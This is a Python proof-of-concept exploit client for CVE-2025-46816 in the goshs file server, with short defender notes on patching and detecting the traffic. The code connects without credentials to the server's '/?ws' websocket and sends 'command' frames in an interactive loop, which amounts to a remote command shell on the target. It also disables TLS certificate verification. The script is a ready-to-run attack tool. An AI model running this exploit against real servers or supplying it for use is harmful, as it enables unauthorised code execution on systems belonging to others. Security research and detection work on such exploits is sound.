# Proof-of-concept client for the issue the banner below labels CVE-2025-46816
# (goshs, versions below 1.0.5 according to that banner).
#
# What the code shows: it opens a websocket to "/?ws" on the target and sends
# JSON frames of the form {"type": "command", "content": <text>}; no
# credential, token or login step appears anywhere in this client.
#
# Defender notes:
#   * Mitigation: the banner lists "< 1.0.5" as affected, so 1.0.5 is
#     presumably the fixed release (confirm against the vendor advisory).
#   * Detection: websocket upgrade requests whose query string is "ws",
#     followed by JSON text frames with "type": "command", are the traffic
#     pattern this client produces.
import ssl
import json
import argparse
import readline  # imported for its side effect: line editing/history for input()
import websockets
from rich import print as rp
from urllib.parse import urlparse
from websockets.sync.client import connect


def msg(x, *args, **kw):
    """Print a status line with a green "[+]" prefix (rich markup)."""
    return rp(f"[green]\\[+][/] {x}", *args, **kw)


def log(x, *args, **kw):
    """Print an informational line with a gold "[>]" prefix (rich markup)."""
    return rp(f"[gold3]\\[>][/] {x}", *args, **kw)


def err(x, *args, **kw):
    """Print an error line with a red "[-]" prefix (rich markup)."""
    return rp(f"[red]\\[-][/] {x}", *args, **kw)


def parse_opts():
    """Read the command-line options.

    Returns:
        The argparse namespace with ``target`` (required string) and
        ``secure`` (bool, selects the TLS websocket scheme).
    """
    cli = argparse.ArgumentParser(
        description='Goshs exploit Unauthenticated Code Execution'
    )
    cli.add_argument(
        "--target", "-t",
        help="Target to attack, example: http://ip:port",
        required=True,
    )
    cli.add_argument(
        "--secure", "-s",
        help="Use encrypted websocket",
        action='store_true',
    )
    return cli.parse_args()


def get_unsafe_ssl_context(is_ssl):
    """Build a TLS context that performs no certificate validation.

    Args:
        is_ssl: when falsy, no context is needed and ``None`` is returned.

    Returns:
        ``None`` for plain connections, otherwise an ``ssl.SSLContext`` with
        hostname checking off and verification set to ``CERT_NONE``. With
        these settings the channel is encrypted but the peer is not
        authenticated: any certificate, including a self-signed one, is
        accepted.
    """
    if is_ssl:
        ctx = ssl.create_default_context()
        # check_hostname has to be cleared before verification is disabled;
        # the ssl module rejects CERT_NONE while hostname checking is on.
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        return ctx
    return None


if __name__ == '__main__':
    args = parse_opts()
    log("Exploit by [gold3]@jrjgjk[/gold3] on [gold3]gosh[/gold3] < 1.0.5 [gold3 u]CVE-2025-46816[/gold3 u]")

    # Accept either a full URL (use its host:port part) or a bare host:port.
    target = urlparse(args.target).netloc or args.target
    proto = "wss" if args.secure else "ws"
    uri = f"{proto}://{target}/?ws"
    msg(f"Connecting to [b blue]{uri}[/b blue]")

    quit_words = ("x", "exit", "quit", "q")
    with connect(uri, ssl=get_unsafe_ssl_context(args.secure)) as ws_client:
        while True:
            cmd = input("\x1b[38;5;178mshell@\x1b[1;37mgoshs:\x1b[0m ")
            if not cmd.strip():
                continue
            if cmd in quit_words:
                log("Bye !")
                break

            # One JSON text frame per line typed; the server's reply is read
            # synchronously and only its "content" field is shown ("Error"
            # when that key is absent).
            frame = json.dumps({"type": "command", "content": cmd})
            ws_client.send(frame)
            reply = json.loads(ws_client.recv())
            print(reply.get("content", "Error"))